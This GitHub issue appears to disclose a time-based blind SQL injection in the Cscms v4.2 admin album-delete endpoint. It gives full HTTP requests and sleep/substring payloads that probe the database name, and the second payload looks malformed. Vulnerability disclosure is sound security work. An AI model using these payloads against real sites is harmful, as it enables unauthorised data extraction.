Skip to content

SQL injection vulnerability exists in Cscms music portal system v4.2(dance_Topic.php_del) #14

Open
@Am1azi3ng

Description

@Am1azi3ng

There is a SQL blind injection vulnerability in dance_Topic.php_del

Details

After the administrator is logged in, you need to add a song album

image

POST /admin.php/dance/admin/topic/save HTTP/1.1
Host: cscms.test
Content-Length: 240
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/topic/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
Connection: close

cid=0&tid=0&yid=0&color=&addtime=ok&name=1&pic=&tags=&fxgs=&yuyan=%E5%9B%BD%E8%AF%AD&diqu=%E5%A4%A7%E9%99%86&year=2022&user=&singer=&skins=topic-show.html&hits=0&yhits=0&zhits=0&rhits=0&shits=0&neir=&file=&title=&keywords=&description=&id=0

image

When deleting a song album, malicious statements can be constructed to achieve sql injection

image

POST /admin.php/dance/admin/topic/del HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
Connection: close

id=3)and(sleep(5))--+

The payload executes and sleeps for 5 seconds

image

contrust payload

POST /admin.php/dance/admin/topic/del HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
Connection: close

id=3)and(if(substr((select+database()),1,1)='c'sleep(5))--+

image

image

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

image

Close "id" to achieve blind injection, so the vulnerability exists

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions